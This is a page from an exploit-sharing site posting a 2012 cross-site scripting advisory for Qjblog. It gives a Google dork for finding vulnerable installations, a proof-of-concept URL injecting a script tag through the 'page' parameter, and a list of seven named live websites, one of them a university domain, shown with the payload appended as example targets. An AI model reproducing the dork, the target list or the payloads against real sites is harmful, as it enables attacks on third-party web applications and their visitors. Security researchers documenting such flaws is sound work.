[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Qjblog - Cross-Site Scripting Vulnerabilities

Author
ShinoBi-Dz
Risk
[
Security Risk Medium
]
0day-ID
0day-ID-18257
Category
web applications
Date add
13-05-2012
Platform
php
#########################################################################
# Exploit Title: [ Qjblog - Cross-Site Scripting Vulnerabilities ]                 
# Date: [13-05-2012]                                                    
# Author: [ShinoBi-Dz]                                                                  
# E-mail : ShinoBiDz442@gmail.com                                       
# Facebook : https://www.facebook.com/shinobi.benz                      
# Category: [webapps]                                                    
# Google dork: intext:"Powered by QJblog"                          
# Tested on: [ Windows ]                                               
#########################################################################

Example Sites : 
http://www.smedu.org/blog/index.asp?page=<script>alert(31337);</script>
http://www.niubowang.com/index.asp?page=<script>alert(31337);</script>
http://nktw.nankai.edu.cn/blog/index.asp?page=<script>alert(31337);</script>
http://www.chinaruiling.cn/bk/index.asp?page=<script>alert(31337);</script>
http://www.guilinbaobao.com/index.asp?page=<script>alert(31337);</script>
http://www.qzwebi.com.cn/blog/index.asp?page=<script>alert(31337);</script>
http://www.bjxhhj.com/blog2/index.asp?page=<script>alert(31337);</script>


[~]Exploit/p0c :
http://server/[path]/index.asp?page=<script>alert(31337);</script>


Greetz :[ Inj3ct0r - KedAns-Dz - Arm4dill0.DZ - Good Luck for all BAC 2012 ] 
                ~(Freedom to Palestin)~



#  0day.today [2024-12-24]  #